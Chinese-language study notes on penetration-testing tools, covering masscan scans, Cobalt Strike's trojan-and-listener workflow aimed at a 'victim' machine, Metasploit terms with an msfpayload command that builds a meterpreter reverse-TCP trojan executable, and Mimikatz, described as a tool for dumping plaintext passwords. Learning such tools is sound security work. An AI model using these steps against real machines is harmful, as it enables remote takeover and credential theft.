MASSCAN 端口扫描

MASSCAN 192.168.253.128 --ports 0-65535

MASSCAN 192.168.0.0/16 -p80

nmap 端口扫描
########################################################################################

Cobalt Strike
java编写，可以跨平台，通过客户端连接服务端，然后对受害机进行攻击
客户端------服务端------(受害机)


#linux部署服务端 windows运行客户端（并不必须）
#运行服务端
./teamserver 192.168.1.1 123456

#客户端
cobaltstrike.bat

---------------------------
创建监听器           Cobalt Strike -> Listeners->Add 用于在服务端开放一个端口接收受害机回传的数据
生成木马             Attacks->Packages->HTML Application（可以为其他类型的）
开启web服务          Attacks->Web Drive-by->Host File 选择将生成的木马通过放到web服务，可以通过url下载（不是必须）
受害机执行木马       如windows命令行运行hta： mshta.exe %URL%
打开Beacon Console   当受害机上线以后，右击选择Interact，在该命令行中进行攻击操作，help查看帮助。


########################################################################################
Metasploit  （开源版本 Metasploit Framework）
 

渗透攻击（Exploit）,指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞，所进行的攻击行为。
攻击载荷（Payload），目标系统在被渗透攻击之后去执行的代码。
Shellcode，是在渗透攻击是作为攻击载荷运行的一组机器指令，通常用汇编语言编写。
模块（Module），指Metasploit框架中所使用的一段软件代码组件，可用于发起渗透攻击或执行某些辅助攻击动作。
监听器（Listener），是Metasploit中用来等待网络连接的组件。



#查看载荷列表
msfpayload -l

#生成meterpreter反弹木马实验
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=10086 X > Desktop/muma01.exe


#进入攻击界面 可以在该界面使用载荷进行攻击
msfconsole 


########################################################################################
Mimikatz   从内存中抓到明文密码（windows）

#运行后进入命令行
#
#查看对应程序的内存信息（在此使用扫雷游戏示例，需要先运行扫雷）
winmine::infos

#暂停
winmine::pause



########################################################################################
kaliLinux  带有各种渗透工具的linux发行版


########################################################################################
w3af(python)
web安全扫描

########################################################################################
OpenVAS
漏洞评估


########################################################################################
WebScarab(java)
http消息分析 
